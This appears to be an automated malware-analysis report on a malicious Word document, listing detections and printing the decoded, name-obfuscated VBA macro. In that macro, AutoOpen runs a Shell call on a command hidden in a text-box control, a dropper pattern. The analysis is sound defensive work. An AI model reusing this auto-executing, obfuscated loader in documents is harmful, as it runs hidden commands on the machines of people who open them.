MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious OLE document containing a VBA macro. The macro utilizes an AutoOpen function and a Shell() call, which are critical indicators of malicious intent. Heuristics indicate suspicious cmd.exe invocation and VBA p-code execution, suggesting the macro attempts to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics 9
-
ClamAV: Doc.Dropper.Generic-6781662-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Generic-6781662-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(nmEhbsbpl, BARBB), hYuYm) Set jLTUEGQFqnOsqIdi = wlhFwnwzMdXcXi -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() owCWJQZV -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7618 bytes |
SHA-256: ee1aece739d536c9260ed47e1521fba1cd295842dbbe8f8f030d5b46c03c51d1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
208 of 243 identifiers look randomly generated (e.g. 'JIjGsUzhVUKAGLVSbFGVjKtG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jzzfSMHbW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
owCWJQZV
End Sub
Attribute VB_Name = "CZAdYStUvHX"
Function owCWJQZV()
On Error Resume Next
Set wQrdECuuScTYSIqOWOpit = HiNiiOXUzBTisNFYh
RDzXIKNGPwVIJPr = Sqr(JIQWUfXwiSFjPdJzhfRqT)
ZCUczazprErLEwHLplfzs = 280710177 * Oct(dqlnXbiwAOZjOBr) * 213645632 * wpaAsEZNpWqfKUrjwrlNncON - (39958568 + CLng(ziNtJzFiADQElmLZhFnSqti) * 928227 * CBool(116453494))
GSJWbNuBGuAwNsZc = ChrW(nSrGwCNuJZnADwMbwr)
Set NDfZjJmonvbHBwGGpADLUhsC = ztAbjosPzLtdljMIuwFWhtC
NiAjhcfKdijPlMEGjsCkN = Sqr(DUrCainfNDqONEoMiWfi)
HwzWhuznorSYkajpiCzXwQjY = 153279644 * Oct(zRXKfEidwXufsonrYLYpdiHX) * 25527025 * iLBqQYziuhQiLOuHdJ - (309760068 + CLng(JIjGsUzhVUKAGLVSbFGVjKtG) * 182656867 * CBool(302434869))
KvWBwbEKabuwwY = ChrW(NZXPYzsbfXCZSzOdi)
Set iCfBtjWcBJPChcTmQdsFJi = RsiofISAINOYwHSVSQbpB
foqRBtolocvTOJ = Sqr(uqTjJGpTDWfzIapi)
jQMtwNHYMWYmccsIJXZIGst = 276566882 * Oct(muWvjLzuDmzzSvcLKw) * 238065845 * jaumowCPZmoXWXMTl - (189984258 + CLng(LZrZpuLrcwwvwJZoLAjG) * 221043452 * CBool(55948043))
UQwaaujJahPYrpBErdHaS = ChrW(rsNzjASBWzCpXJrUlwsn)
Set lAGiwHjSrLLiiatrJVSZjiN = tiPMoVTqifBMjWvXhwkQwL
cLdTJInMCmRpSsUiWrVwDYj = Sqr(mausiwwqhjnAKCK)
vSwZShcfMTOYdPrDiVjjO = 305211060 * Oct(EpaHiETTThoBkZGpFzPj) * 94767448 * YMSsjWoVbTAnukratasAu - (284365274 + CLng(OGdXjblwNQUROoqVziwGVA) * 322118673 * CBool(208728423))
ziEpnOpjXEmFwIuqUm = ChrW(ZSdlDEuVwkUOJwBiwj)
Set GWwoSRPYSbwnPzqYw = nIAfttmvOokZvDWGWN
RvDijwQmwIpWqVR = Sqr(AObdDCXCaosjsQJbcQ)
bjZQjcGomZRuEijWsvkE = 103489344 * Oct(BIvGkthzNuZrpkbzuBw) * 92921625 * cItoCJuRjsLODiRUasMGm - (79647834 + CLng(UMozuuAjIBnYzBSikn) * 228786871 * CBool(219507374))
OclBJcUJjHwQlZ = ChrW(NKzWfJDNQJSTIJcTDiV)
Set vzCPPihSjVmPzmkv = kMcrUPTrAfmHbQiaXjKbwNl
XnoGJVluoqXwIS = Sqr(hiXOzuLHEDpcCaUwWba)
hbNifusSksmRFIcsYz = 245394507 * Oct(MfjCUsiUTsBUiwt) * 36849839 * pjFCsWLRXWuzcZWqSH - (11138488 + CLng(KNmLYzsrRjHPXXjQfETIXlz) * 146042906 * CBool(263143660))
rSiiPqrNKbwtisiUAo = ChrW(faFqFKNosVZQQXBIZ)
Const BARBB = 0
Set HpwhplJNQNzsWJG = zAAJnAniRGlGhbcWC
iFPftnkoGDJVFCHvIX = Sqr(MRGBQPizCfokcpCbBBUG)
ZztkZvBizmSErpCb = 22696817 * Oct(PKniIRSjfCaFtoQRnSMRqThR) * 17108925 * VfkzAzzBEwarqcSsQwHtsin - (173772217 + CLng(jOmJvcVfPwmvfC) * 178383077 * CBool(52913345))
jUqwckzzDjJIArrKzRkLsJU = ChrW(LaffzkvjlAuTjG)
Set frccuUhFuHUaRF = WzIzJMZHDJfwspmSuKDIDJn
WdHUwdIONifGiRfqGkZ = Sqr(PYpQHpaQNwqNKjdjFE)
ZARiKJjkdfMBTjTJ = 326662133 * Oct(qMHDsAQrSvznzlBZASzqiG) * 180923614 * wlBvXdrZjsOsCV - (57111215 + CLng(RSqklpjaztjBMHJkl) * 20152202 * CBool(48210301))
zVTpEZHGXJWiJjY = ChrW(PrTGEaviuqNYidHz)
Set SJYuwqikoRdmizcDdUE = FWsWJpvSMBJjGRhKvCZOv
WGbwRPfTjXWCSwRBkGuMX = Sqr(ItfQSSHbuqmWAmuNYjmtVl)
EzktuRSUiLjwiQAz = 88080178 * Oct(EcjQvwfHXiOaiRWj) * 179976373 * hZNJbVDLRnMzXjYhQ - (59564774 + CLng(oDoOmtkFIjRbBoiPnzvA) * 68773519 * CBool(84745249))
frvaKiBwBNAmOtLbPrQui = ChrW(MLIpTkjUIWbTIWrTZbHjQOAC)
Set WkIWqYmomjqFfLzjZMAOIAr = CBhHwcvPZwYwpnP
KTaFIWiCfLhoDBiWtCTpqirJ = Sqr(bjimwrmzDDoZmwjXfclvHL)
OBFnTaFjcRRjqvPjUv = 282547079 * Oct(wtzGDnRLCGNfPI) * 131210778 * sDSWzWMIURqcPvRARLZVE - (332836221 + CLng(jIuiWDlQhbioQcUCbhomm) * 323136653 * CBool(271983746))
GoNOEjwjuUlODsqEiAIAlHBX = ChrW(IwnPMzjTwXhpWMwcztwrGzir)
Set sNUGKTHhDjRGFfqRMO = kDBGfNHWiIsNzUDt
XkqzARhjFiVaYaqRWXSrG = Sqr(tDwdYKWRmBlFtcXOjmUaZf)
vFhBvdwkCdirmAXsWKnwU = 275341250 * Oct(hOuHnjWjPORBXqJbo) * 271789047 * icLkkOMtwQljRGnAm - (8334024 + CLng(JEjzSdUzzBMjzGDHpW) * 196630798 * CBool(59655813))
amYPdfAukqWZSjMCfsHPONs = ChrW(hmcNwziIsbiRHhowUEPLq)
Set jLZpLuNiVrzdRWljJ = lVOlZLGPRwPOGXzFHCf
fPBOKRNRNQmKqifrEumNivc = Sqr(TGkajLPjDSvWUzbHw)
CAKEYcrFBNQRJjnkvDjmkB = 9729067 * Oct(GYiJXESiPstbGO) * 224220323 * ibKCTlJLjjEXaLE - (8244200 + CLng(HwztihwulCQqLdhVYEJqzjUP) * 152139204 * CBool(171105132))
AuDDorcwPiOzuNHhjsVXFX = ChrW(CHvKzYdkWItwzi)
nmEhbsbpl = jzzfSMHbW.TextBox1 + nirCnwnM + rFKdWti + qzuuzDJ + zhvXG + smAmzw + cbpcwKNZ + TwzvhH + UQMsKkBR
Set sihsmnjBjfsGkoqGizN = MZfMUWYTLcKBwpQmhLZwUnE
wZuhPjrOUlMSCVX = Sqr(ONqDUqIuYEYTaQYZV)
PubqDblvjNdwjMnJhGz = 3165304 * Oct(FRAJKLYoEMmwiFdnYKOSYK) * 309407234 * ZUMfRiScVkJcbhsQM - (49922150 + CLng(BqBEGJVJwihOvWjjqwsW) * 141544640 * CBool(304490910))
buwAMqRwGRhtaYPF = ChrW(wYVtnWNGszCRTkHGja)
Set hEizqYdEwutMCXjkzOAw = jjoknbmCGLlWjZVl
zRNhlbptwrDGwkzpUAUpMCzr = Sqr(riHqVwOwBQikcv)
zrrjivIamjMYAvl = 313918327 * Oct(WfushDatpHzUQEsEMq) * 140671586 * NIGjIVJJZNCPUNOw - (6393976 + CLng(RoQqtnKFVcTToFQkH) * 93680435 * CBool(165296667))
jLtRTbFizCqvEwZj = ChrW(XOSYCAhpFYzzkGAXpjFvwWR)
Set aZqsBcaMcufsOBb = diSRkMbwHjEGNSkfDHWX
cvBQDYXwGouastZuaX = Sqr(wtkVXTwJKAoGfDMA)
RBjoEABsKjUZKkdjIZZsa = 198839566 * Oct(EOMvRhPWjsqdZrZttjcNmikz) * 103998388 * WWimIJmFcZrEjKuK - (265807065 + CLng(TGDsijfIzQJaiNjGKsst) * 234001145 * CBool(216694674))
UPABpzRScpDfJHiowHAMWvB = ChrW(iYdACSuznPjdhiqJfwhkahW)
Set TcrVckAjRZMzKtVzw = uRCVYzzKHcSKKfBZsQYiwDAM
aMkDZclTzkIMwErYRcYO = Sqr(OjzlAEZQzqQprwm)
HizhrNvsMuMjKhbb = 331553543 * Oct(LjmSYYMDztsWGFFKJt) * 169070722 * PBlEZGrsFQPorUmGapJaV - (263057495 + CLng(CApnHbzXhCRGKvhs) * 122454397 * CBool(214443563))
zjdDflSwjUkzMboiDj = ChrW(kRGtimaOcLtwruBqd)
Set iXIObtrWwBBcMzujCXpldRK = XpSUZpGKRZCYriHCEL
PoDFSAnwtNNPRNlqlbWwHvrL = Sqr(uVrTQnjSSuiUkzUlrNwDJk)
GsVahOrUzrSXivid = 174669355 * Oct(zzTCWBcCKPhuIcJLlbuM) * 336142116 * bZlcRbpqMkWWMl - (286345365 + CLng(VTwfDbmDjpNTKC) * 229402256 * CBool(91942541))
tXtRtkAMUDzYlQYTiGaOT = ChrW(znhtbOWjKBIoSO)
Set mOhWqUodafwaVsnwKwk = PszSmmsawNkiMrESqra
JXDoBwnVizzTsi = Sqr(uRPkEcNiMvSOdnV)
SWkProIQowWwANQ = 249422836 * Oct(iJBbHWYwtqsijJhIrjzI) * 124387936 * GIwwFFRdzfjkviTfL - (340087766 + CLng(TwzQhEponJjTdKQD) * 298711286 * CBool(185829084))
RSfPrNCzNDoLVzwz = ChrW(IrRsQRdUSLDZfaaDAi)
Set jiODPpXMRbBpdzSVkvs = XmHoWvJwlnWhhbiYBjMNKqt
cduhifiPuGAtbZjUf = Sqr(adFTHBSuTAjfjhtsLtA)
SGJGmbblzbDrhjQQJJW = 297691579 * Oct(kLdjOaTAiNnTDJTTw) * 215139196 * ZhzswrwzQciCWHNivjZY - (7980348 + CLng(lONQYdZzwKcqThm) * 123648863 * CBool(218010107))
QcCXALQMqbYnZIiQvjijTV = ChrW(TjXafnfvczkHYGNNCz)
Set lnbPpaPCoQopNNVzK = riGczjQjGnJqWPFiLRUzzi
HXJKoWYGamWTzJJprwF = Sqr(ctwtZkiBDcNpMIwEoZ)
NhjiEAwFVCccwsJzOZPl = 24454654 * Oct(WDwYjGrLFBSWsnwKtsdiNz) * 176477901 * OzCKjfYnYZKdkf - (135270120 + CLng(OKzbJcAWBDfWHZZXcwKiDj) * 180014462 * CBool(169033189))
izSdTaOYnPDCzqlzjJjz = ChrW(fzznAmVlliiXzf)
wZIlTLDl = Array(nAVvF, qcklYKjv, oAGKiVch, Interaction _
_
_
_
_
_
_
_
.Shell(nmEhbsbpl, BARBB), hYuYm)
Set jLTUEGQFqnOsqIdi = wlhFwnwzMdXcXi
EtzAAtIaYMzqDvajc = Sqr(YpBGEnXWUsdtcTJw)
wJdiHqLJtwwtEmwuRzoPwo = 78655757 * Oct(dZQwfjjhGHdXzjQzpwL) * 281934946 * dPGjwLTUjpIzBBhaPdJ - (105956988 + CLng(mzIZukipZBdVAzKJQ) * 214356414 * CBool(161656131))
NaRUawfiYaTBaNrS = ChrW(HDalfGofcACXQzzlDBLfnwwF)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.